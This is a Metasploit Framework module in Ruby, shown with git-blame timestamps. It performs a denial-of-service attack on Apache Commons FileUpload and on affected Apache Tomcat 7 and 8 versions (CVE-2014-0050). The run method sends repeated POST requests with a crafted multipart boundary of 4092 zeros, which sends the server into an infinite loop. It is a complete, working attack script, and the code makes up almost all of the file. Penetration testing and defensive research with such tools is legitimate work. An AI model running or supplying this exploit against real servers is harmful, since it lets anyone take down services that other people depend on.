metasploit-framework/modules/auxiliary/dos/http/apache_commons_fileupload_d...

76 lines
2.4 KiB
Ruby
Raw Normal View History

2014-02-22 13:56:59 +00:00
##
2017-07-24 13:26:21 +00:00
# This module requires Metasploit: https://metasploit.com/download
2014-02-22 13:56:59 +00:00
# Current source: https://github.com/rapid7/metasploit-framework
##
2016-03-08 13:02:44 +00:00
class MetasploitModule < Msf::Auxiliary
2014-02-22 13:56:59 +00:00
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
'Name' => 'Apache Commons FileUpload and Apache Tomcat DoS',
'Description' => %q{
2014-02-26 14:52:51 +00:00
This module triggers an infinite loop in Apache Commons FileUpload 1.0
through 1.3 via a specially crafted Content-Type header.
Apache Tomcat 7 and Apache Tomcat 8 use a copy of FileUpload to handle
mime-multipart requests, therefore, Apache Tomcat 7.0.0 through 7.0.50
and 8.0.0-RC1 through 8.0.1 are affected by this issue. Tomcat 6 also
uses Commons FileUpload as part of the Manager application.
2014-02-22 13:56:59 +00:00
},
'Author' =>
[
2014-02-26 14:52:51 +00:00
'Unknown', # This issue was reported to the Apache Software Foundation and accidentally made public.
2014-02-22 13:56:59 +00:00
'ribeirux' # metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2014-0050'],
['URL', 'http://tomcat.apache.org/security-8.html'],
2014-02-26 14:52:51 +00:00
['URL', 'http://tomcat.apache.org/security-7.html']
2014-02-22 13:56:59 +00:00
],
'DisclosureDate' => 'Feb 6 2014'
))
register_options(
[
Opt::RPORT(8080),
2014-02-24 21:20:34 +00:00
OptString.new('TARGETURI', [ true, "The request URI", '/']),
2014-02-22 13:56:59 +00:00
OptInt.new('RLIMIT', [ true, "Number of requests to send",50])
])
2014-02-22 13:56:59 +00:00
end
def run
boundary = "0"*4092
opts = {
'method' => "POST",
2014-02-24 21:20:34 +00:00
'uri' => normalize_uri(target_uri.to_s),
2014-02-22 13:56:59 +00:00
'ctype' => "multipart/form-data; boundary=#{boundary}",
'data' => "#{boundary}00000",
'headers' => {
'Accept' => '*/*'
}
}
# XXX: There is rarely, if ever, a need for a 'for' loop in Ruby
# This should be rewritten with 1.upto() or Enumerable#each or
# something
2014-02-22 13:56:59 +00:00
for x in 1..datastore['RLIMIT']
2014-02-26 14:52:51 +00:00
print_status("Sending request #{x} to #{peer}")
2014-02-22 13:56:59 +00:00
begin
c = connect
r = c.request_cgi(opts)
c.send_request(r)
# Don't wait for a response
rescue ::Rex::ConnectionError => exception
2016-02-01 22:06:34 +00:00
print_error("Unable to connect: '#{exception.message}'")
2014-02-22 13:56:59 +00:00
return
ensure
disconnect(c) if c
end
end
end
end